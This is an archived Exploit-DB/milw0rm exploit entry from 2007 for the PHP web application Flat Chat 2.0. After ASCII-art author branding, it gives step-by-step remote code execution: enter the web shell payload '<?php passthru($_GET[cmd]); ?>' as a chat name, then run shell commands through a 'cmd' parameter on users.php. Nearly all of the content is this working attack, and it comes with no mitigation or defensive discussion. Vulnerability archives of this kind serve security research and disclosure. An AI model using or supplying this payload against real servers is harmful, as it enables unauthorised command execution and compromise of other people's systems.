Flat Chat 2.0 - 'include online.txt' Remote Code Execution

EDB-ID:

3428

Author:

Dj7xpl

Type:

webapps

Platform:

PHP

Published:

2007-03-07

                                           .-""""""""-.                                 
                                          /   Dj7xpl   \                              
                                         |              |                                
                                         |,  .-.  .-.  ,|                                
                                         | )(_o/  \o_)( |                                     
                                         |/     /\     \|                                 
                               (@_       (_     ^^     _)                  
                          _     ) \_______\__|IIIIII|__/_______________________________
                         (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                )_/        \          / 
                                (@
+_______________________________________________________________________________________________________________________+
+
+
+                               +=============================================+
+                               |                                             |
+                               | Portal   : Flat Chat                        |
+                               | Version  : 2.0                              |
+                               | Author   : Dj7xpl  | Dj7xpl@yahoo.com       |
+                               | Download : Http://www.undoweb.frih.net      |
+                               | Risk     : High (Remote Code Execution)     |
+                               |                                             |
+                               +=============================================+
+
+              Exploit : 
+                         Http://localhost/flatchat/index.php   <<<<<<  Open Index Page
+
+                         Insert This Script In Chat Name:  e.g:  <?php passthru($_GET[cmd]); ?>
+
+                         Http://localhost/flatchat/users.php?cmd=ls -la   <<<  Enter Your Command
+                                                                              				            	  
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-03-07]